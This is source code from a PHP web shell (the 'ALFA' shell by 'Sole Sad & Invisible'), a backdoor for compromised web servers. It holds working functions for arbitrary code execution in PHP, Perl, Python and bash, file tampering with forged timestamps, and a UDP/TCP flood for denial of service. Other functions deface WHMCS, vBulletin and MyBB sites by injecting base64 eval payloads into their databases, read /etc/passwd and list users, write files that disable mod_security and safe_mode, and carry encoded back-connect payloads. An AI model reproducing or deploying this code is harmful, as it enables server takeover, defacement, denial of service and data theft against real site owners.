    $file_perm = substr(sprintf(`%o`, @fileperms($_POST[`alfa1`])),-4);

}

echo `
`;

break;

case `edit`:

@chdir($_POST[`c`]);

if(!@is_writable($_POST[`alfa1`])&&!_alfa_is_writable($_POST[`alfa1`])){

echo `File isn`t writeable`;

break;

}

if(!empty($_POST[`alfa3`])){

$_POST[`alfa3`] = substr($_POST[`alfa3`],1);

$time = @filemtime($_POST[`alfa1`]);

$fp = @__write_file($_POST[`alfa1`],$_POST[`alfa3`]);

if($chdir_fals&&$alfa_canruncmd){

    $rname = $alfa1_decoded;

    $randname = $rname.rand(111,9999);

    $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;

    if($fp = @__write_file($filepath ,$_POST[`alfa3`])){

        alfaEx("mv `".addslashes($filepath)."` `".addslashes($_POST["alfa1"])."`;rm -f `".addslashes($filepath)."`");

    }

}

if($fp){

echo `Saved!
`;

@touch($_POST[`alfa1`],$time,$time);

}

}

echo `copy to clipboard
`;<br />
echo htmlspecialchars(__read_file($_POST[`alfa1`]));<br />
echo `
`;

break;

case `hexdump`:

@chdir($_POST[`c`]);

$c = __read_file($_POST[`alfa1`]);

$n = 0;

$h = array(`00000000
`,``,``);

$len = strlen($c);

for ($i=0; $i<$len; ++$i) {

$h[1] .= sprintf(`%02X`,ord($c[$i])).` `;

switch ( ord($c[$i]) ) {

case 0: $h[2] .= ` `; break;

case 9: $h[2] .= ` `; break;

case 10: $h[2] .= ` `; break;

case 13: $h[2] .= ` `; break;

default: $h[2] .= $c[$i]; break;

}

$n++;

if ($n == 32) {

$n = 0;

if ($i+1 < $len) {$h[0] .= sprintf(`%08X`,$i+1).`
`;}

$h[1] .= `
`;

$h[2] .= "
";

}

}

echo `
`.$h[0].`
`.$h[1].`
`.htmlspecialchars($h[2]).`
`;

break;

case `rename`:

@chdir($_POST[`c`]);

$alfa1_escape = addslashes($_POST["alfa1"]);

$alfa3_escape = addslashes($_POST["alfa3"]);

if(!empty($_POST[`alfa3`])){

$cmd_rename = false;

if($chdir_fals&&$alfa_canruncmd){

if(_alfa_is_writable($_POST[`alfa1`])){

$alfa1_escape = addslashes($alfa1_decoded);

alfaEx("cd `".addslashes($_POST[`c`])."`;mv `".$alfa1_escape."` `".addslashes($_POST[`alfa3`])."`");

}else{

$cmd_rename = true;

}

}else{

$alfa1_escape = addslashes($_POST["alfa1"]);

}

if(!@rename($_POST[`alfa1`], $_POST[`alfa3`])&&$cmd_rename){

echo `Can`t rename!
`;}else{echo(`Renamed!`);$alfa1_escape = $alfa3_escape;}

}

echo `
`;

break;

case `touch`:

@chdir($_POST[`c`]);

if( !empty($_POST[`alfa3`]) ) {

$time = strtotime($_POST[`alfa3`]);

if($time){

$touched = false;

if($chdir_fals&&$alfa_canruncmd){

    alfaEx("cd `".addslashes($_POST["c"])."`;touch -d `".htmlspecialchars(addslashes($_POST[`alfa3`]))."` `".addslashes($alfa1_decoded)."`");

    $touched = true;

}

if(!@touch($_POST[`alfa1`],$time,$time)&&!$touched)

echo `Fail!`;

else

echo `Touched!`;

} else echo `Bad time format!`;

}

clearstatcache();

echo `
`;

break;

case `image`:

@chdir($_POST[`c`]);

echo(`
`);

$file = $_POST[`alfa1`];

$image_info = @getimagesize($file);

if(is_array($image_info)||$chdir_fals){

$width = (int)$image_info[0];

$height = (int)$image_info[1];

if($chdir_fals&&$alfa_canruncmd){

    $source = alfaEx("cat `".addslashes($file)."` | base64");

    list($width, $height) = explode(":", alfaEx("identify -format `%w:%h` `".addslashes($file)."`"));

    $mime = explode(":", alfaEx("file --mime-type `".addslashes($file)."`"));

    $image_info[`mime`] = $mime[1];

}else{

    $source = __ZW5jb2Rlcg(__read_file($file, false));

}

$image_info_h = "Image type = [ ".$image_info[`mime`]." ]
Image Size = [ ".$width." x ".$height." ]
";

if($width > 800){$width = 800;}

echo $content = "
".$image_info_h."

";

}

break;

}

echo ``;

alfaFooter();

}

function findicon($file,$type){

$s = `http://solevisible.com/icons/`;

$types = array(`json`,`ppt`,`pptx`,`xls`,`xlsx`,`msi`,`config`,`cgi`,`pm`,`c`,`cpp`,`cs`,`java`,`aspx`,`asp`,`db`,`ttf`,`eot`,`woff`,`woff2`,`woff`,`conf`,`log`,`apk`,`cab`,`bz2`,`tgz`,`dmg`,`izo`,`jar`,`7z`,`iso`,`rar`,`bat`,`sh`,`alfa`,`gz`,`tar`,`php`,`php4`,`php5`,`phtml`,`html`,`xhtml`,`shtml`,`htm`,`zip`,`png`,`jpg`,`jpeg`,`gif`,`bmp`,`ico`,`txt`,`js`,`rb`,`py`,`xml`,`css`,`sql`,`htaccess`,`pl`,`ini`,`dll`,`exe`,`mp3`,`mp4`,`m4a`,`mov`,`flv`,`swf`,`mkv`,`avi`,`wmv`,`mpg`,`mpeg`,`dat`,`pdf`,`3gp`,`doc`,`docx`,`docm`);

if($type!=`file`){

return ($file==`..`?$s.`back.png`:$s.`folder.png`);

}else{

$ext = explode(`.`,$file);

$ext = end($ext);

$ext = strtolower($ext);

return (in_array($ext,$types)?$s.$ext.`.png`:$s.`notfound.png`);

}

}

function alfadlfile(){

if(isset($_POST[`c`],$_POST[`file`])){

$basename = rawurldecode(basename($_POST[`file`]));

$_POST[`file`] = str_replace("//", "/", $_POST[`c`].`/`.$basename);

$alfa_canruncmd = _alfa_can_runCommand(true,true);

if(@is_file($_POST[`file`]) && @is_readable($_POST[`file`]) || $alfa_canruncmd){

ob_start("ob_gzhandler", 4096);

header("Content-Disposition: attachment; filename="".addslashes($basename).""");

header("Content-Type: application/octet-stream");

if(isset($GLOBALS["glob_chdir_false"])){

    $randname = $basename.rand(111,9999);

    $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);

    $filepath = $scriptpath."/".$randname;

    if(_alfa_is_writable($scriptpath)){

        alfaEx("cp `".addslashes($_POST["file"])."` `".addslashes($filepath)."`");

        readfile($filepath);

        @unlink($filepath);

    }else{

        alfaEx("cat `".addslashes($_POST["file"])."`");

    }

}else{

    readfile($_POST[`file`]);

}

}else echo(`Error...!`);}}

function alfaphpeval(){

alfahead();

if(isset($_POST[`alfa2`]) && ($_POST[`alfa2`] == `ini`)){

echo `
`;

ob_start();

$INI=ini_get_all();

print ``

.``

.``

.``

.``;

foreach ($INI as $param => $values)

print "
".``

.``

.``

.``

.``;

$tmp = ob_get_clean();

$tmp = preg_replace(`!(body|a:w+|body, td, th, h1, h2) {.*}!msiU`,``,$tmp);

$tmp = preg_replace(`!td, th {(.*)}!msiU`,`.e, .v, .h, .h th {$1}`,$tmp);

echo str_replace(`
`;

}

if(isset($_POST[`alfa2`]) && ($_POST[`alfa2`] == `info`)) {

echo `
`;

ob_start();

phpinfo();

$tmp = ob_get_clean();

$tmp = preg_replace(`!(body|a:w+|body, td, th, h1, h2) {.*}!msiU`,``,$tmp);

$tmp = preg_replace(`!td, th {(.*)}!msiU`,`.e, .v, .h, .h th {$1}`,$tmp);

echo str_replace(`
`;

}

if(isset($_POST[`alfa2`]) && ($_POST[`alfa2`] == `exten`)) {

echo `
`;

ob_start();

$EXT=get_loaded_extensions();

echo `
Param
Global value
Local Value
Access
`.$param.`
`.$values[`global_value`].` 
`.$values[`local_value`].` 
`.$values[`access`].` 
`."
".`
`.implode(`
`, $EXT).`
`.count($EXT).` extensions loaded`;

echo `

`;

}

$lang_html = "";

foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= ``.$val.``;}

echo `
| INI_INFO |  | phpinfo | | extensions |
Select Language: 
 `.$lang_html.`

`.(!empty($_POST[`alfa1`])?htmlspecialchars($_POST[`alfa1`]):``).``;

echo `
`;

if(!empty($_POST[`alfa1`])){

if($_POST[`alfa3`]=="php"){

ob_start();

eval($_POST[`alfa1`]);

$result = htmlspecialchars(ob_get_clean());

}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){

    if(isset($_SESSION["eval_tmpdir"])){

        $tempdir = $_SESSION["eval_tmpdir"];

    }else{

        $tempdir = dirname(alfaEx("mktemp"));

        $_SESSION["eval_tmpdir"] = $tempdir;

    }

    $lang = $_POST[`alfa3`];

    $filename = "temp".rand(11111,99999);

    $temp = $tempdir."/".$filename ;

    __write_file($filename, $_POST[`alfa1`]);

    $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");

    @unlink($filename);

    @unlink($temp);

}

echo ``.$result.``;

}

echo `
`;

alfafooter();

}

function alfahash(){

if(!function_exists(`hex2bin`)) {function hex2bin($p) {return decbin(hexdec($p));}}

if(!function_exists(`full_urlencode`)) {function full_urlencode($p){$r=``;for($i=0;$i
$stringTools = array(

`Base64_encode ( $string )` => `__ZW5jb2Rlcg($s)`,

`Base64_decode ( $string )` => `__ZGVjb2Rlcg($s)`,

`strrev ( $string )` => `strrev($s)`,

`bin2hex ( $string )` => `bin2hex($s)`,

`hex2bin ( $string )` => `hex2bin($s)`,

`md5 ( $string )` => `md5($s)`,

`sha1 ( $string )` => `sha1($s)`,

`hash ( "sha251", $string ) --> sha251` => `hash("sha256",$s)`,

`hash ( "sha384", $string ) --> sha384` => `hash("sha384",$s)`,

`hash ( "sha512", $string ) --> sha512` => `hash("sha512",$s)`,

`crypt ( $string )` => `crypt($s)`,

`crc32 ( $string )` => `crc32($s)`,

`str_rot13 ( $string )` => `str_rot13($s)`,

`urlencode ( $string )` => `urlencode($s)`,

`urldecode  ( $string )` => `urldecode($s)`,

`full_urlencode  ( $string )` => `full_urlencode($s)`,

`htmlspecialchars  ( $string )` => `htmlspecialchars($s)`,

`base64_encode (gzdeflate( $string , 9)) --> Encode` => `__ZW5jb2Rlcg(gzdeflate($s, 9))`,

`gzinflate (base64_decode( $string )) --> Decode` => `@gzinflate(__ZGVjb2Rlcg($s))`,

`str_rot13 (base64_encode( $string )) --> Encode` => `str_rot13(__ZW5jb2Rlcg($s))`,

`base64_decode (str_rot13( $string )) --> Decode` => `__ZGVjb2Rlcg(str_rot13($s))`,

`str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode` => `str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))`,

`gzinflate (base64_decode(str_rot13( $string ))) --> Decode` => `@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))`,

);

alfahead();

echo `
`;

echo "
Method:
 ";

foreach($stringTools as $k => $v)

echo "".$k."";

echo " 
".(empty($_POST[`alfa1`])?``:htmlspecialchars(@$_POST[`alfa2`]))."
";

if(!empty($_POST[`alfa1`])){

$string = addslashes($_POST[`alfa2`]);

$string = str_replace(`"`,`"`,$string);

$alg = $_POST[`alfa1`];

$code = str_replace(`$s`,"`".$string."`",$alg);

ob_start();

eval(`echo `.$code.`;`);

$res = ob_get_contents();

ob_end_clean();

if(in_array($alg, $stringTools))echo ``.htmlspecialchars($res).``;

}

echo "
";

alfaFooter();

}

function alfados(){

alfahead();

echo `
`;

echo `
| DOS |
Method : UDPTCP Host :  Time :  Port :  
`;

if(!empty($_POST[`alfa1`]) && !empty($_POST[`alfa2`]) && !empty($_POST[`alfa3`])){

echo __pre();

$packets=0;

ignore_user_abort(true);

$exec_time=(int)$_POST[`alfa2`];

$time=time();

$max_time=$exec_time+$time;

$host=$_POST[`alfa1`];

$port=(int)$_POST[`alfa3`];

$method=$_POST[`alfa4`];

$out = str_repeat(`X`,65000);

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = @fsockopen($method.`://`.$host, $port, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo "$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second";

echo "
";

}

echo ``;

alfafooter();

}

function __pre(){return(`
`);}

function alfaIndexChanger(){

alfahead();



echo `
| Index Changer |
| Whmcs | | vBulletin | | MyBB | `;

if(isset($_POST[`alfa3`])&&($_POST[`alfa3`] == `whmcs`)){

echo __pre();



echo "
| Whmcs |


".getConfigHtml(`whmcs`)."


";

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `inputName` => `dbh`, `id` => `db_host`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `URL`, `inputName` => `path`, `inputValue` => `http://site.com/whmcs`, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `File Name`, `inputName` => `fname`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `inputName` => `dbn`, `id` => `db_name`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `inputName` => `dbu`, `id` => `db_user`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `inputName` => `dbp`, `id` => `db_pw`, `inputValue` => ``, `inputSize` => `50`)

);

create_table($table);

echo "
| Your Index |



<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b>




";

if(isset($_POST[`alfa6`])){

$s0levisible="Powered By Solevisible";

$dbu = $_POST[`alfa6`];

$path = $_POST[`alfa5`];

$fname = $_POST[`alfa4`];

$dbn = $_POST[`alfa7`];

$dbp = $_POST[`alfa8`];

$dbh = $_POST[`alfa9`];

$index = $_POST[`alfa10`];

$index = str_replace("`","`",$index);

$deface = `$x = base64_decode("`.__ZW5jb2Rlcg($index).`"); $solevisible = fopen("`.$fname.`","w"); fwrite($solevisible,$x);`;

$saveData = __ZW5jb2Rlcg($deface);

$Def = `{php}eval(base64_decode("`.$saveData.`"));{/php}`;

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name=`Password Reset Validation`");

$soleGet = mysqli_fetch_assoc($soleSave);

$tempSave1 = $soleGet[`message`];

$tempSave = str_replace("`","`",$tempSave1);

$inject = "UPDATE tblemailtemplates SET message=`$Def` WHERE name=`Password Reset Validation`";

$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));

$create = "insert into tblclients (email) values(`solevisible@fbi.gov`)";

$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));

if(function_exists(`curl_version`)){

$AlfaSole = new AlfaCURL(true);

$saveurl = $AlfaSole->Send($path."/pwreset.php");

$getToken = preg_match("/name="token" value="(.*?)"/i",$saveurl,$token);

$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");

$backdata = "UPDATE tblemailtemplates SET message=`{$tempSave}` WHERE name=`Password Reset Validation`";

$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));

__alert(`File Created...`);

echo "

Click Here !

";

}else{

echo "

Please go to Target " ".$path."/pwreset.php "
 and reset password with email => solevisible@fbi.gov
and go to " ".$path."/".$fname." "

";

}}}}

if(isset($_POST[`alfa1`]) && ($_POST[`alfa1`] == `vb`)){

echo __pre();



echo "
| vBulletin |


".getConfigHtml(`vb`)."


";

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `inputName` => `dbh`, `id` => `db_host`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `inputName` => `dbn`, `id` => `db_name`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `inputName` => `dbu`, `id` => `db_user`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `inputName` => `dbp`, `id` => `db_pw`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Prefix`, `inputName` => `prefix`, `id` => `db_prefix`, `inputValue` => ``, `inputSize` => `50`)

);

create_table($table);

echo "
| Your Index |



<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b>


";

if($_POST[`alfa8`]==`>>`){

$s0levisible="Powered By Solevisible";

$dbu = $_POST[`alfa2`];

$dbn = $_POST[`alfa3`];

$dbp = $_POST[`alfa4`];

$dbh = $_POST[`alfa5`];

$index = $_POST[`alfa6`];

$prefix = $_POST[`alfa7`];

$index=str_replace("`","`",$index);

$set_index = "{${eval(base64_decode(`";

$set_index .= __ZW5jb2Rlcg("echo "$index";");

$set_index .= "`))}}{${exit()}}";

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$loli1 = "UPDATE ".$prefix."template SET template=`".$set_index."".$s0levisible."` WHERE title=`spacer_open`";

$loli2 = "UPDATE ".$prefix."template SET template=`".$set_index."".$s0levisible."` WHERE title=`FORUMHOME`";

$loli3 = "UPDATE ".$prefix."style SET css=`".$set_index."".$s0levisible."`, stylevars=``, csscolors=``, editorstyles=``";

@mysqli_query($conn,$loli1) or die (mysqli_error($conn));

@mysqli_query($conn,$loli2) or die (mysqli_error($conn));

@mysqli_query($conn,$loli3) or die (mysqli_error($conn));

__alert(`VB index changed...!`);

}

}

}

if(isset($_POST[`alfa2`]) && ($_POST[`alfa2`] == `mybb`)) {

echo __pre();



echo "
| Mybb |


".getConfigHtml(`mybb`)."


";

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `inputName` => `mybbdbh`, `id` => `db_host`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `inputName` => `mybbdbn`, `id` => `db_name`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `inputName` => `mybbdbu`, `id` => `db_user`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `inputName` => `mybbdbp`, `id` => `db_pw`, `inputValue` => ``, `inputSize` => `50`)

);

create_table($table);

echo "
| Your Index |



<br />
<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b>
";

if(isset($_POST[`alfa6`])){

$mybb_dbh = $_POST[`alfa6`];

$mybb_dbu = $_POST[`alfa7`];

$mybb_dbn = $_POST[`alfa8`];

$mybb_dbp = $_POST[`alfa9`];

$mybb_index = $_POST[`alfa10`];

if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){

$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));

$prefix="mybb_";

$loli7 = "UPDATE ".$prefix."templates SET template=`".$mybb_index."` WHERE title=`index`";

$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));

__alert(`MyBB index changed...!`);

}

}

}

echo "
";

alfafooter();

}

function alfaproc()

{

alfahead();

echo "

";

if(empty($_POST[`ajax`])&&!empty($_POST[`alfa1`]))

$_SESSION[md5($_SERVER[`HTTP_HOST`]).`ajax`] = false;

if($GLOBALS[`sys`]=="win"){

$process=array(

"Task List" =>"tasklist /V",

"System Info" =>"systeminfo",

"Active Connections" => "netstat -an",

"Running Services" => "net start",

"User Accounts" => "net user",

"Show Computers" => "net view",

"ARP Table" => "arp -a",

"IP Configuration" => "ipconfig /all"

);}else{

$process=array(

"Process status" => "ps aux",

"Syslog" =>"cat /etc/syslog.conf",

"Resolv" => "cat /etc/resolv.conf",

"Hosts" =>"cat /etc/hosts",

"Cpuinfo"=>"cat /proc/cpuinfo",

"Version"=>"cat /proc/version",

"Sbin"=>"ls -al /usr/sbin",

"Interrupts"=>"cat /proc/interrupts",

"lsattr"=>"lsattr -va",

"Uptime"=>"uptime",

"Fstab" =>"cat /etc/fstab"

);}

foreach($process as $n => $link){

echo ` | `.$n.` | `;

}

echo "
";

if(!empty($_POST[`alfa1`])){

echo "
";

if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd `".addslashes($_POST["c"])."`;";}

echo alfaEx($cmd.$_POST[`alfa1`]);

echo `
`;

}

echo "
";

alfafooter();

}

function alfasafe(){

alfahead();

echo "

| Auto ByPasser |
";

echo `
| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains | `;

if(!empty($_POST[`alfa8`]) && isset($_POST[`alfa8`]) == `domains`){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

echo __pre();

$solevisible9 = _alfa_file(`/etc/named.conf`);

if(is_array($solevisible9)){

foreach($solevisible9 as $solevisible13){

if(@eregi(`zone`,$solevisible13)){

preg_match_all(`#zone "(.*)"#`,$solevisible13,$solevisible14);

if(strlen(trim($solevisible14[1][0])) > 2){

echo $solevisible14[1][0].`
`;

}}}

}

}else{

echo __pre();

$users = _alfa_file("/etc/virtual/domainowners");

if(is_array($users)){

foreach($users as $boz){

$dom = explode(":",$boz);

echo $dom[0]."
";}}}}

if(!empty($_POST[`alfa6`]) && isset($_POST[`alfa6`]) == `valiases`){

echo `

Url:  
`;

if(isset($_POST[`alfa9`]) && $_POST[`alfa9`] == `>>`){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

$site = trim($_POST[`alfa7`]);

$rep = str_replace(array("https://","http://","www."),"",$site);

$user = "";

if(function_exists("posix_getpwuid") && function_exists("fileowner")){

    if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){

        $user = $user[`name`];

    }

}else{

    if(_alfa_can_runCommand(true,true)){

        $user = alfaEx("stat -c `%U` /etc/valiases/".$rep);

    }

}

if(!empty($user)&&$user!=`root`){

echo __pre()."
User: 
{$user}
site: 
{$rep}";

}else {echo __pre().`No such file or directory Or Disable Functions is not NONE...`;}

}else{

$site = trim($_POST[`alfa7`]);

$rep = str_replace(array("https://","http://","www."),"",$site);

$users = _alfa_file("/etc/virtual/domainowners");

foreach($users as $boz){

$ex = explode(":",$boz);

if($ex[0] == $rep){

echo __pre()."


User: 
".trim($ex[1])."
site: 
{$rep}";break;}}}}}

if(!empty($_POST[`alfa5`]) && isset($_POST[`alfa5`])){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

echo __pre();

$i = 0;

while ($i < 60000) {

$line = @posix_getpwuid($i);

if (!empty($line)) {

while (list ($key, $vl) = each($line)){

echo $vl."
";

break;}}$i++;}

}else{echo __pre();

$users = _alfa_file("/etc/virtual/domainowners");

foreach($users as $boz){

$user = explode(":",$boz);

echo trim($user[1]).`
`;}}}

if(!empty($_POST[`alfa4`]) && isset($_POST[`alfa4`])){

echo __pre();

if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){

for($uid=0;$uid<60000;$uid++){

$ara = @posix_getpwuid($uid);

if(!empty($ara)){

while(list ($key, $val) = each($ara)){

echo "$val:";

}echo "
";}}

}else{__alert(`failed...`);}}

if(!empty($_POST[`alfa2`]) && isset($_POST[`alfa2`])){

@__write_file($GLOBALS[`cwd`].".htaccess","#Generated By Sole Sad and Invisible

Sec------Engine Off
Sec------ScanPOST Off
");

echo `htaccess for Apache created...!`;

}

if(!empty($_POST[`alfa1`])&& isset($_POST[`alfa1`])){

@__write_file($GLOBALS[`cwd`]."php.ini","safe_mode=OFF
disable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");

echo ` php.ini created...!`;

}

if(!empty($_POST[`alfa3`]) && isset($_POST[`alfa3`])){

@__write_file($GLOBALS[`cwd`].".htaccess","#Generated By Sole Sad and Invisible

ForceType application/x-httpd-php4


SecFilterEngine Off
SecFilterScanPOST Off
");

echo `htaccess for Litespeed created...!`;

}

echo "
";

alfafooter();

}

function __get_resource($content){

return @gzinflate(__ZGVjb2Rlcg($content));

}

function __write_file($file, $content){

if($fh = @fopen($file, "wb")){

if(fwrite($fh, $content)!==false) return true;

}

return false;

}

function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){

$res = "[ Success...! ]";

$err = "[ Failed...! ]";

if($evalOptions!="") $evalOptions = $evalOptions." ";

if($evalArguments!="") $evalArguments = " ".$evalArguments;

if($evalType=="c"){

$tmpdir = ALFA_TEMPDIR;

chdir($tmpdir);

if(is_writable($tmpdir)){

$uniq = substr(md5(time()),0,8);

$filename = $evalType.$uniq.".c";

$path = $filename;

if(__write_file($path, $evalCode)){

$ext = ($GLOBALS[`sys`]==`win`)? ".exe":".out";

$pathres = $filename.$ext;

$evalOptions = "-o ".$pathres." ".$evalOptions;

$cmd = "gcc ".$evalOptions.$path;

alfaEx($cmd);

if(is_file($pathres)){

if(chmod($pathres, 0755)){

$cmd = $pathres.$evalArguments;

alfaEx($cmd);

}else{$res = $err;}

unlink($pathres);

}else{$res = $err;}

unlink($path);

}else{$res = $err;}

}

return $res;

}elseif($evalType=="java"){

$tmpdir = ALFA_TEMPDIR;

chdir($tmpdir);

if(is_writable($tmpdir)){

if(preg_match("/class ([^{]+){/i",$evalCode, $r)){

$classname = trim($r[1]);

$filename = $classname;

}else{

$uniq = substr(md5(time()),0,8);

$filename = $evalType.$uniq;

$evalCode = "class ".$filename." { ".$evalCode . " } ";

}

$path = $filename.".java";

if(__write_file($path, $evalCode)){

$cmd = "javac ".$evalOptions.$path;

alfaEx($cmd);

$pathres = $filename.".class";

if(is_file($pathres)){

if(chmod($pathres, 0755)){

$cmd = "java ".$filename.$evalArguments;

alfaEx($cmd);

}else{$res = $err;}

unlink($pathres);

}else{$res = $err;}

unlink($path);

}else{$res = $err;}

}

return $res;

}

return false;

}

function alfaconnect(){

alfahead();

$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";

$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLS